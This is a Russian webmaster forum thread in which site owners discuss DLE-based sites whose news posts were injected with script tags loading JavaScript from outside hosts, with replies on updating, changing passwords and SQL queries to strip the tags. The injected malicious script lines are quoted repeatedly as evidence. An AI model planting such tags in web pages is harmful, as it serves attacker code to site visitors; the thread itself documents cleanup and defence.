Взломали сайт на DLE

[Удален]
11111

Вообщем есть два сайта. по каким то причинам их хакают. т.е в полную и коротку новость добавляют ифрейм вида:

<script src="http://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script><script src="http://zheenix.msk.ru/f71879559bcfc86dd2ddeb0cf71e135c.js" type="text/javascript"></script><script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>

Этот код всегда разный во всех новостях... буду чистить дня 2... да и через некоторое время этот код сам появляется на новых новостях..

Сайт из за этого ужасно тормозит, даже на половину еле как загружается.

Что делать помогите?

RO
На сайте с 25.10.2008
Offline
108
#1
Fania:
Вообщем есть два сайта. по каким то причинам их хакают. т.е в полную и коротку новость добавляют ифрейм вида:

<script src="http://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script><script src="http://zheenix.msk.ru/f71879559bcfc86dd2ddeb0cf71e135c.js" type="text/javascript"></script><script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>

Этот код всегда разный во всех новостях... буду чистить дня 2... да и через некоторое время этот код сам появляется на новых новостях..

Сайт из за этого ужасно тормозит, даже на половину еле как загружается.
Что делать помогите?

Что-то похожее было и у меня. Чистил руками.

Советую воспользоваться советами от Хортица.

/ru/forum/comment/8246743

[Удален]
#2
Fania:
Вообщем есть два сайта. по каким то причинам их хакают. т.е в полную и коротку новость добавляют ифрейм вида:

<script src="http://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script><script src="http://zheenix.msk.ru/f71879559bcfc86dd2ddeb0cf71e135c.js" type="text/javascript"></script><script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>

Этот код всегда разный во всех новостях... буду чистить дня 2... да и через некоторое время этот код сам появляется на новых новостях..

Сайт из за этого ужасно тормозит, даже на половину еле как загружается.
Что делать помогите?

1) Последняя версия dle ?

2) Если нет то на офф сайте уязвимости смотрели и закрывали?

3) Хостеры не со школы?

4) Меняйте все пароли, от фтп, админки cms, базам данных.

[Удален]
#3
Powinteh:
1) Последняя версия dle ?
2) Если нет то на офф сайте уязвимости смотрели и закрывали?
3) Хостеры не со школы?
4) Меняйте все пароли, от фтп, админки cms, базам данных.

А если Шелл залит есть смысл менять пороли тогда?

ArtBlogger
На сайте с 21.07.2010
Offline
88
#4

Если бы вы делали бэкап, то чистить 2 дня не пришлось... обновитесь до версии 9.2

RO
На сайте с 25.10.2008
Offline
108
#5
обновитесь до версии 9.2

А вы думаете там дыр нет? Старые закрываются - появляются новые.

ArtBlogger
На сайте с 21.07.2010
Offline
88
#6
rws-omsk:
А вы думаете там дыр нет? Старые закрываются - появляются новые.

По крайней мере в новых версиях их гораздо меньше, да и взлом может происходить, если автор использует неофициальную сборку дле. Например, можно вспомнить историю со сборкой от zloy.

I1
На сайте с 07.10.2010
Offline
19
#7

Совет как быстро почистить БД!

CaguCT, выйди с темы!!! Иди в раздел " Услуги"

Как я почистил БД?

Итак:

У меня в краткой и полной новости появилось по 3 скрипта

<script src="http://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script><script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script><script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>

Делим их для удобства:

1.

<script src="http://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script>

2.

<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>

3.

<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>

1 удалить будет сложнее т.к код после слеша везде разный, поэтому начнем со 2 и 3!

Идем в phpmyadmin, выбираем вкладку SQL, видим окошко и туда вписываем:

UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>%'

Нажимаем ОК, после чего пропадет из новостей скрипт №2!

Не закрывая SQL удаляем так же скрипт №3 тоесть выполняем Такой sql запрос:

UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>%'

Нажимаем ОК!

Скрипт №3 так же удален!

Теперь возьмемся за скрипт №1

В phpmyadmin выбираем вкладку "Экспорт" и нажимаем ОК, сохраняем на компьютер!

Открываем эту базу с помощью ОФИСОВСКОГО ВОРДА, нажимаем "правка"---->>>"замена" и вписываем в поле найти: (zheenix)*(js) а в поле замена zheenix.ru , тут же нажимаем "больше" и ставим галочку на "Подстановочные знаки" , нажимаем "заменить все"!

Этим мы избавились от разного кода! Сохраняем изменения!

Идем в phpmyadmin ---> структура ----> и отмечаем все галочки ---> далее удаляем все!

Теперь идем во вкладку "импорт" , нажимаем обзор и выбираем Нашу измененную БД, ставим вместо utf8 ---> cp1251 и нажиимаем ОК! База загружена!

Теперь бежим в вкладку SQL и выполняем такой запрос:

UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://zheenix.ru" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://zheenix.ru" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://zheenix.ru" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://zheenix.ru" type="text/javascript"></script>%'

нажимаем ОК!

Вот собственно и все! Можно конечно и облегчить это все, но я написал как делал сам!

Заняло у меня это минут 10, все же быстей и проще чем руками это делать!

Теперь только надо думать о заплатках)

Хортица
На сайте с 22.12.2006
Offline
289
#8

igoryanzx1, ого Вы товарищ мазохист... столько лишних движений...

А заплатки и методы лечения DLE у меня в блоге.

На XBit.Money (https://xbit.money/?rid=111) меняю крипту на гривны. Лучшие курсы Обмен Вашего PayPal/ЯД/QIWI/WebMoney и куча плюшек! Рекомендую (https://exchangex.ru/index.php?who=26749)
I1
На сайте с 07.10.2010
Offline
19
#9
Хортица:
igoryanzx1, ого Вы товарищ мазохист... столько лишних движений...

Я ж написал что можно и проще, а если точнее то пару манипуляций в том же ворде!

а за "заплатки и методы лечения DLE у меня в блоге" спасибо!
Master_globus
На сайте с 15.09.2006
Offline
113
#10

Хортица, Вернулись в строй? :)

Работаю только с diafan.CMS 4.4.0 (http://cms.diafan.ru/cms576/)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий